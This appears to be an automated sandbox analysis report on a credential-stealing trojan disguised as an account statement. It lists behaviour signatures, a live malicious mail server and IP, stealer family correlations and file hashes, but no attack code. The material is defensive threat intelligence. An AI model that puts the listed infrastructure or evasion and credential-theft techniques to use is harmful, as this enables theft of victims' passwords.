                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job                    		Logon Script (Windows)1
                    Scheduled Task/Job                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		521
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model1
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets151
                    Virtualization/Sandbox Evasion                    		SSHKeylogging13
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                    Virtualization/Sandbox Evasion                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428829 Sample: UPDATED SSTATEMENT OF ACCOUNT.exe Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 42 mail.tabcoeng.com 2->42 44 ip-api.com 2->44 46 3 other IPs or domains 2->46 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Sigma detected: Scheduled temp file as task from temp location 2->56 58 15 other signatures 2->58 8 UPDATED SSTATEMENT OF ACCOUNT.exe 7 2->8         started        12 TgfQNrhQjjseHY.exe 5 2->12         started        signatures3 process4 file5 38 C:\Users\user\AppData\...\TgfQNrhQjjseHY.exe, PE32 8->38 dropped 40 C:\Users\user\AppData\Local\...\tmpC678.tmp, XML 8->40 dropped 60 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->60 62 Writes to foreign memory regions 8->62 64 Allocates memory in foreign processes 8->64 66 Adds a directory exclusion to Windows Defender 8->66 14 MSBuild.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        68 Multi AV Scanner detection for dropped file 12->68 70 Machine Learning detection for dropped file 12->70 72 Injects a PE file into a foreign processes 12->72 24 MSBuild.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 48 mail.tabcoeng.com 135.181.124.14, 587 HETZNER-ASDE Germany 14->48 50 ip-api.com 208.95.112.1, 49711, 49714, 80 TUT-ASUS United States 14->50 74 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->74 76 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->76 78 Tries to steal Mail credentials (via file / registry access) 14->78 80 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 14->80 82 Loading BitLocker PowerShell Module 18->82 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        84 Tries to harvest and steal ftp login credentials 24->84 86 Tries to harvest and steal browser information (history, passwords, etc) 24->86 36 conhost.exe 26->36         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    UPDATED SSTATEMENT OF ACCOUNT.exe37%ReversingLabs
                    UPDATED SSTATEMENT OF ACCOUNT.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe37%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    bg.microsoft.map.fastly.net
                    		199.232.214.172
                    		truefalse
                      		unknown
                      ip-api.com
                      		208.95.112.1
                      		truefalse
                        		high
                        mail.tabcoeng.com
                        		135.181.124.14
                        		truetrue
                          		unknown
                          fp2e7a.wpc.phicdn.net
                          		192.229.211.108
                          		truefalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://ip-api.com/line/?fields=hostingfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://tempuri.org/x.xsd?MultiGames.Properties.ResourcesUPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.drfalse
                                		unknown
                                http://mail.tabcoeng.comMSBuild.exe, 00000008.00000002.2160120971.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3349333951.0000000002A9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://account.dyn.com/UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TgfQNrhQjjseHY.exe, 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2141321180.0000000003251000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2160120971.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, TgfQNrhQjjseHY.exe, 00000009.00000002.2178810898.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3349333951.0000000002A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/zuppao).UPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.drfalse
                                        		high
                                        http://ip-api.comMSBuild.exe, 00000008.00000002.2160120971.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3349333951.0000000002A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          208.95.112.1
                                          		ip-api.comUnited States
                                          		53334TUT-ASUSfalse
                                          135.181.124.14
                                          		mail.tabcoeng.comGermany
                                          		24940HETZNER-ASDEtrue

                                          General Information

                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1428829
                                          Start date and time:2024-04-19 17:13:09 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 14s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:18
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:UPDATED SSTATEMENT OF ACCOUNT.exe
                                          Detection:MAL
                                          Classification:mal100.spre.troj.spyw.evad.winEXE@19/15@2/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 99%
                                          • Number of executed functions: 110
                                          • Number of non-executed functions: 9
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                          • Excluded IPs from analysis (whitelisted): 52.159.127.243, 52.165.165.26, 192.229.211.108, 20.3.187.198, 199.232.214.172, 52.165.164.15
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, wns.notify.trafficmanager.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: UPDATED SSTATEMENT OF ACCOUNT.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          17:14:01API Interceptor1x Sleep call for process: UPDATED SSTATEMENT OF ACCOUNT.exe modified
                                          17:14:03API Interceptor27x Sleep call for process: powershell.exe modified
                                          17:14:04Task SchedulerRun new task: TgfQNrhQjjseHY path: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe
                                          17:14:04API Interceptor197x Sleep call for process: MSBuild.exe modified
                                          17:14:05API Interceptor1x Sleep call for process: TgfQNrhQjjseHY.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          208.95.112.1Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • ip-api.com/line/?fields=hosting
                                          REMITTANCE COPY.exeGet hashmaliciousAgentTeslaBrowse
                                          • ip-api.com/line/?fields=hosting
                                          New Voicemail_Daiichi-Sankyo.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • ip-api.com/json/?fields=status,country,regionName,city,query
                                          DHL.exeGet hashmaliciousAgentTeslaBrowse
                                          • ip-api.com/line/?fields=hosting
                                          KjCBSM7Ukv.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                          • ip-api.com/line/?fields=hosting
                                          eO2bqORIJb.exeGet hashmaliciousAgentTeslaBrowse
                                          • ip-api.com/line/?fields=hosting
                                          SecuriteInfo.com.Win64.Evo-gen.10533.31255.exeGet hashmaliciousUnknownBrowse
                                          • ip-api.com/json
                                          13w4NM6mPa.exeGet hashmaliciousLummaCBrowse
                                          • ip-api.com/json
                                          mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                          • ip-api.com/line/?fields=hosting
                                          mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                          • ip-api.com/line/?fields=hosting
                                          135.181.124.14REMITTANCE COPY.exeGet hashmaliciousAgentTeslaBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            fp2e7a.wpc.phicdn.netREMITTANCE COPY.exeGet hashmaliciousAgentTeslaBrowse
                                            • 192.229.211.108
                                            eOU2MVDmTd.exeGet hashmaliciousCredGrabber, Meduza Stealer, PureLog Stealer, zgRATBrowse
                                            • 192.229.211.108
                                            purchaseorder4.exeGet hashmaliciousPython StealerBrowse
                                            • 192.229.211.108
                                            https://cionfacttalleriproj.norwayeast.cloudapp.azure.com/?finanzas.busqueda?q=Secretar%C3%ADa+de+Administraci%C3%B3n+y+Finanzas?30337974_3097_705331937556-157889157889770732479410588494105884Get hashmaliciousHTMLPhisherBrowse
                                            • 192.229.211.108
                                            https://diversityjobs.com/employer/company/1665/Worthington-Industries-IncGet hashmaliciousUnknownBrowse
                                            • 192.229.211.108
                                            https://app.box.com/s/ktl5qtvf2us1megbgmjabwqaxcdy69b5Get hashmaliciousUnknownBrowse
                                            • 192.229.211.108
                                            https://dt.r24dmp.de/Get hashmaliciousUnknownBrowse
                                            • 192.229.211.108
                                            s.exeGet hashmaliciousUnknownBrowse
                                            • 192.229.211.108
                                            https://bestprizerhere.life/?u=3w8p605&o=pn1kfzq&t=pshtb_redirectUrl_bodyGet hashmaliciousGRQ ScamBrowse
                                            • 192.229.211.108
                                            http://bestprizerhere.life/Get hashmaliciousUnknownBrowse
                                            • 192.229.211.108
                                            ip-api.comCopy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 208.95.112.1
                                            REMITTANCE COPY.exeGet hashmaliciousAgentTeslaBrowse
                                            • 208.95.112.1
                                            New Voicemail_Daiichi-Sankyo.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 208.95.112.1
                                            DHL.exeGet hashmaliciousAgentTeslaBrowse
                                            • 208.95.112.1
                                            KjCBSM7Ukv.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                            • 208.95.112.1
                                            eO2bqORIJb.exeGet hashmaliciousAgentTeslaBrowse
                                            • 208.95.112.1
                                            SecuriteInfo.com.Win64.Evo-gen.10533.31255.exeGet hashmaliciousUnknownBrowse
                                            • 208.95.112.1
                                            13w4NM6mPa.exeGet hashmaliciousLummaCBrowse
                                            • 208.95.112.1
                                            mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                            • 208.95.112.1
                                            mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                            • 208.95.112.1
                                            mail.tabcoeng.comREMITTANCE COPY.exeGet hashmaliciousAgentTeslaBrowse
                                            • 135.181.124.14
                                            bg.microsoft.map.fastly.netCopy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 199.232.210.172
                                            https://royaltattoo.in/js/kalexander@yourlawyer.comGet hashmaliciousPhisherBrowse
                                            • 199.232.214.172
                                            REMITTANCE COPY.exeGet hashmaliciousAgentTeslaBrowse
                                            • 199.232.214.172
                                            purchaseorder4.exeGet hashmaliciousPython StealerBrowse
                                            • 199.232.210.172
                                            https://cionfacttalleriproj.norwayeast.cloudapp.azure.com/?finanzas.busqueda?q=Secretar%C3%ADa+de+Administraci%C3%B3n+y+Finanzas?30337974_3097_705331937556-157889157889770732479410588494105884Get hashmaliciousHTMLPhisherBrowse
                                            • 199.232.210.172
                                            https://diversityjobs.com/employer/company/1665/Worthington-Industries-IncGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            s.exeGet hashmaliciousUnknownBrowse
                                            • 199.232.214.172
                                            https://bestprizerhere.life/?u=3w8p605&o=pn1kfzq&t=pshtb_redirectUrl_bodyGet hashmaliciousGRQ ScamBrowse
                                            • 199.232.214.172
                                            https://jll2.sharepoint.com/:f:/t/WorkplaceStrategy274/EqyxzpLxD8lEhSn1hXMNtKMBbmoik8-xeuIbHrYk7cgngA?e=5%3a2wyFQq&at=9&xsdata=MDV8MDJ8cGF0cmljaWEucmliZWlyb0Bub3ZvYmFuY28ucHR8NjlmMTdkMWU5YzBjNDFkN2UwZmIwOGRjNTNjN2YwZTV8MTAzMzgwNDgxOTNhNDI5OGFiZWEzNTk2YWU4OGIwNWV8MHwwfDYzODQ3NzM2NTQwMjI0OTQwNXxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18MHx8fA%3d%3d&sdata=T2RkZHdHdHpwUXkxSG5Kd2Noc1RHVUc3YVNLVE1sOWZUTXdVZitYYXh6Yz0%3dGet hashmaliciousHTMLPhisherBrowse
                                            • 199.232.210.172
                                            ServerInfo.exeGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            HETZNER-ASDEREMITTANCE COPY.exeGet hashmaliciousAgentTeslaBrowse
                                            • 135.181.124.14
                                            https://bestprizerhere.life/?u=3w8p605&o=pn1kfzq&t=pshtb_redirectUrl_bodyGet hashmaliciousGRQ ScamBrowse
                                            • 136.243.216.235
                                            New Soft Update.exeGet hashmaliciousUnknownBrowse
                                            • 116.203.164.39
                                            Oo2yeTdq5J.elfGet hashmaliciousMiraiBrowse
                                            • 88.198.32.246
                                            H8wnVxIEh6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 197.242.86.246
                                            QXeoSsX87R.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 144.79.65.41
                                            3OcPSlVa7n.elfGet hashmaliciousMiraiBrowse
                                            • 168.119.31.114
                                            http://www.indeks.pt/Get hashmaliciousUnknownBrowse
                                            • 176.9.67.69
                                            PBZcC2ge1z.exeGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                            • 95.216.228.180
                                            https://00f82de.blob.core.windows.net/00f82de/1.html?4SdhQu6964HfYs43wfnwuulljn913CWVGBFRQHRPAHNP32199OVKO12176b14#14/43-6964/913-32199-12176Get hashmaliciousPhisherBrowse
                                            • 178.63.248.54
                                            TUT-ASUSCopy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 208.95.112.1
                                            REMITTANCE COPY.exeGet hashmaliciousAgentTeslaBrowse
                                            • 208.95.112.1
                                            New Voicemail_Daiichi-Sankyo.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 208.95.112.1
                                            DHL.exeGet hashmaliciousAgentTeslaBrowse
                                            • 208.95.112.1
                                            KjCBSM7Ukv.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                            • 208.95.112.1
                                            eO2bqORIJb.exeGet hashmaliciousAgentTeslaBrowse
                                            • 208.95.112.1
                                            SecuriteInfo.com.Win64.Evo-gen.10533.31255.exeGet hashmaliciousUnknownBrowse
                                            • 208.95.112.1
                                            13w4NM6mPa.exeGet hashmaliciousLummaCBrowse
                                            • 208.95.112.1
                                            mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                            • 208.95.112.1
                                            mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                            • 208.95.112.1

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            1138de370e523e824bbca92d049a3777REMITTANCE COPY.exeGet hashmaliciousAgentTeslaBrowse
                                            • 173.222.162.64
                                            https://www.dropbox.com/l/scl/AADwcgxTbjuvzakz6kszZMzP6RXavhxhixQGet hashmaliciousHTMLPhisherBrowse
                                            • 173.222.162.64
                                            eOU2MVDmTd.exeGet hashmaliciousCredGrabber, Meduza Stealer, PureLog Stealer, zgRATBrowse
                                            • 173.222.162.64
                                            https://cionfacttalleriproj.norwayeast.cloudapp.azure.com/?finanzas.busqueda?q=Secretar%C3%ADa+de+Administraci%C3%B3n+y+Finanzas?30337974_3097_705331937556-157889157889770732479410588494105884Get hashmaliciousHTMLPhisherBrowse
                                            • 173.222.162.64
                                            https://bestprizerhere.life/?u=3w8p605&o=pn1kfzq&t=pshtb_redirectUrl_bodyGet hashmaliciousGRQ ScamBrowse
                                            • 173.222.162.64
                                            New Voicemail_Daiichi-Sankyo.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 173.222.162.64
                                            VnSRmWE631.htmlGet hashmaliciousUnknownBrowse
                                            • 173.222.162.64
                                            xYUpeXwPkWEHXm4.exeGet hashmaliciousAgentTeslaBrowse
                                            • 173.222.162.64
                                            nBBR7c5gR5.htmlGet hashmaliciousUnknownBrowse
                                            • 173.222.162.64
                                            dwutTyDPzl2TBZV.exeGet hashmaliciousAgentTeslaBrowse
                                            • 173.222.162.64

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TgfQNrhQjjseHY.exe.log

                                            Download File
                                            Process:C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UPDATED SSTATEMENT OF ACCOUNT.exe.log

                                            Download File
                                            Process:C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):2232
                                            Entropy (8bit):5.380805901110357
                                            Encrypted:false
                                            SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//8M0Uyus:lGLHxvCsIfA2KRHmOugw1s
                                            MD5:B11E25ABF5BF7766D7D7437596AFFED0
                                            SHA1:D673CFF28D1C21A672BFE165614629B2BB23DE93
                                            SHA-256:EE402CA8A7E7FA1F95CD644AFE756C8AF734E810797FD3E9C6762FCC2510F3F6
                                            SHA-512:D4C19BF1948BCF50899840F4B670ECF7510D65597054A89963D3155DB3869E65F2ABA2F6CE9C9E5F18890A65719E514E1D1EC6394EF99DF21E60F8220FA157C4
                                            Malicious:false
                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_caww4iwt.cup.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dnlgrcyq.nbj.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyunuva1.4cb.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mra1hua4.ssk.ps1

                                            Download File
